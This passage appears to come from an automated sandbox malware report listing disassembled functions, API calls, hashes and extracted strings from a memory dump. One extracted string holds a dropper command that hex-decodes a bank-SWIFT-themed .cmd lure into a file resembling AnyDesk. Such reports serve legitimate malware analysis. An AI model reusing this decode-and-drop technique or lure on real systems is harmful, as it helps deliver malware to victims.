                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3541575487-4006019111
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ad5cff42fe5763c4566e59661365a070a5d12fa5a35ac76a9845f4d513b84402
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 55A1F021B1839241EE24AB659C242BBE291BF45BE4FC85234EF6E477C4EF3CE4418320
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC8114 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41filenativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FileInformation$HandleQueryVolume
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2149833895-4006019111
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 031b29f9c3a5ab169ab6a7436925cea4718c6acc008cdbb9a328edb39569137a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42118C226087C28AE7609B10FD503AFEBA0FB84B98F844131DA9D42A55DBBCD449CB10
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EBF8C0 Relevance: 40.6, APIs: 21, Strings: 2, Instructions: 380COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF706EBF52A,00000000,00000000,?,00000000,?,00007FF706EBE626,?,?,00000000,00007FF706EC1F69), ref: 00007FF706EBF8DE
                                                                                                                                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBF8FB
                                                                                                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBF951
                                                                                                                                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBF96B
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBFA8E
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF706EBFB14
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBFB2D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBFBEA
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF706EBF996
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0010: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF706ED849D,?,?,?,00007FF706EDF0C7), ref: 00007FF706EC0045
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0010: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF706EDF0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF706EDE964), ref: 00007FF706EC0071
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0010: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EC0092
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0010: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF706EC00A7
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0010: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF706EC0181
                                                                                                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706ECD401
                                                                                                                                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706ECD41B
                                                                                                                                                                                                                                                                                                                                                                                                                                          • longjmp.MSVCRT(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706ECD435
                                                                                                                                                                                                                                                                                                                                                                                                                                          • longjmp.MSVCRT(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706ECD480
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          • =,;, xrefs: 00007FF706EBF8C8
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd" "C:\\Users\\Public\\AnyDes, xrefs: 00007FF706EBF90E
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterFileLeave$LockPointerShared_get_osfhandlelongjmp$AcquireByteCharErrorLastMultiReadReleaseWidewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: =,;$C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd" "C:\\Users\\Public\\AnyDes
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3964947564-2189690253
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 437f8b7fcf736409396ac7cc20901e166c58cf944e079e5a2b19de2cf122d3e7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE027A35A09B42C6EA18BB21AC701BBF6A5FF54B65FD49235D91E432E4DF3DA402C720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EBEF40 Relevance: 33.7, APIs: 16, Strings: 3, Instructions: 465COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF706EBE626,?,?,00000000,00007FF706EC1F69), ref: 00007FF706EBF000
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBF031
                                                                                                                                                                                                                                                                                                                                                                                                                                          • iswdigit.MSVCRT(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBF0D6
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: iswdigitiswspacewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1595556998-2755026540
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e013f4d0c287cbe3ebfa2f1e287e0593fa020df7ca7306767efc87d432fedd09
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2229AA5E0875382FA647B15AD7427BE6A0BF14790FC4A236D99D432E4DF3CE4468730
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EBD3F0 Relevance: 33.6, APIs: 16, Strings: 3, Instructions: 310memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$Processwcschr$Alloc$Sizeiswspace
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: "$=,;$P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3545743878-4228052034
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 73fa9e116da620696fffe97e52088c6f91df5c18545e73a04b14457c878b2c5e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8C19065E0976282EB656B119C203BBF6A1FF49F54F85A235CA4E073D8EF3CA445C620
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706ED5BF4 Relevance: 28.2, APIs: 2, Strings: 14, Instructions: 153windowthreadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CurrentFormatMessageThread
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $P<dwj`$ReturnHr$[%hs(%hs)]$[%hs]
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2411632146-1242007574
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 644a5044fc3c8f07a0ab4ce909b6d37b12d7617ee617ff8dff5f4caccfbfbd2d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05615875A19B4281EA64FB51AC245BBA3A0FF44B88FC8013ADE4D07798DF3DE5418B20
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706ED93E8 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 168COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ConsoleMode$Handle$wcsrchr$CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailureiswspacewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: $P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3829876242-4171432244
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 36f06e3d08532ca81a5edfe934237e460a1a732ce599c0ccd33d145c7dd1b7e6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA617F26A1874286EA14AB11DC2417FF7A1FFC9B99F899134DE0E07795DF3CE8058B60
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EE03AC Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$ErrorLast$InformationVolume
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %04X-%04X$P<dwj`$~
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2748242238-2177630653
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 527acd2d5873e217b6583c2a0f855b60256f074d3be57f79744cf5756af0c24e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 78843b0c3cf6557c70c98a33fa516fc345877d794327105bc2ee123ca5d1bab9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 527acd2d5873e217b6583c2a0f855b60256f074d3be57f79744cf5756af0c24e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3FA19636708BC28AEB25AF209C502EAB7A1FF85788F808135DA4D4BB59DF7CD645C710
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB9400 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 161COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$ErrorInformationLastVolume_wcsicmptowupper
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: FAT$P<dwj`$~
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2238823677-699400580
